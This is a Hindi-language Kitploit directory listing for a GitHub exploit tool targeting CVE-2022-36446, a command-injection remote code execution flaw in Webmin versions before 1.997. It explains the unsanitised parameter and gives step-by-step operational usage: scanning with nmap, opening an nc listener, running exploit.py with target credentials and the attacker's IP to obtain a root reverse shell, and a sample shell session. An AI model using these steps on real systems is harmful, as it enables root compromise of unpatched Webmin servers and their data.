Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-36446-Webmin-RCE — Webmin < 1.997 के लिए सॉफ़्टवेयर पैकेज अपडेट मॉड्यूल के माध्यम से प्रमाणित रिमोट कोड निष्पादन एक्सप्लॉइट। अनसैनिटाइज़्ड पैरामीटर के माध्यम से रूट के रूप में मनमाने कमांड इंजेक्ट करता है, रिवर्स शेल वितरित करता है। | Kitploit
उपकरण/GitHubGitHub/darnabin/cve-2022-36446-webmin-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubdarnabin/cve-2022-36446-webmin-rce

CVE-2022-36446-Webmin-RCE

Webmin < 1.997 के लिए सॉफ़्टवेयर पैकेज अपडेट मॉड्यूल के माध्यम से प्रमाणित रिमोट कोड निष्पादन एक्सप्लॉइट। अनसैनिटाइज़्ड पैरामीटर के माध्यम से रूट के रूप में मनमाने कमांड इंजेक्ट करता है, रिवर्स शेल वितरित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2022-36446 — Webmin < 1.997 RCE (प्रमाणित)

यह शोषण Webmin के 1.997 से पहले के संस्करणों में रिमोट कोड निष्पादन (RCE) भेद्यता के लिए है, सॉफ्टवेयर पैकेज अपडेट मॉड्यूल के माध्यम से।

यह कैसे काम करता है?

Webmin का Software Package Updates मॉड्यूल सिस्टम में पास करने से पहले u पैरामीटर को सही ढंग से सैनिटाइज़ नहीं करता है। उस मॉड्यूल तक पहुँच वाला एक प्रमाणित उपयोगकर्ता मनमाने आदेश इंजेक्ट कर सकता है जो रूट के रूप में निष्पादित होते हैं।


पूर्वापेक्षाएँ

शोषण चलाने से पहले निर्भरताएँ स्थापित करें:

root@kitploit:~
pip3 install requests beautifulsoup4 lxml urllib3

पैरामीटर

पैरामीटरविवरणउदाहरण
-tलक्ष्य का URL (पोर्ट के बिना)https://192.168.1.10
-uWebmin उपयोगकर्ताadmin
-pWebmin पासवर्डpassword123
-lआपका आईपी (जहाँ आप शेल प्राप्त करते हैं)192.168.1.5
-lpवह पोर्ट जहाँ आप सुन रहे हैं4444

चरण-दर-चरण

1 — Nmap से लक्ष्य का आईपी पता करें:

root@kitploit:~
nmap -sV TARGET_IP
# Busca el puerto 10000 con Webmin

2 — अपनी मशीन पर लिसनर खोलें:

root@kitploit:~
nc -lvnp 4444

3 — दूसरे टर्मिनल में, शोषण चलाएँ:

root@kitploit:~
python3 exploit.py \
  -t https://TARGET_IP \
  -u admin \
  -p PASSWORD \
  -l TU_IP \
  -lp 4444

4 — यदि शोषण सफल होता है तो आप देखेंगे:

5 — लिसनर में आपको रूट के रूप में एक शेल प्राप्त होगा:

root@kitploit:~
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}

पूर्ण उदाहरण

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444

संदर्भ

  • CVE: CVE-2022-36446
  • CVSS स्कोर: 9.9 (गंभीर)
  • कमजोर संस्करण: Webmin < 1.997
  • मूल शोषण: https://www.exploit-db.com/exploits/50998
  • मूल लेखक: Emir Polat
टूल डाउनलोड करें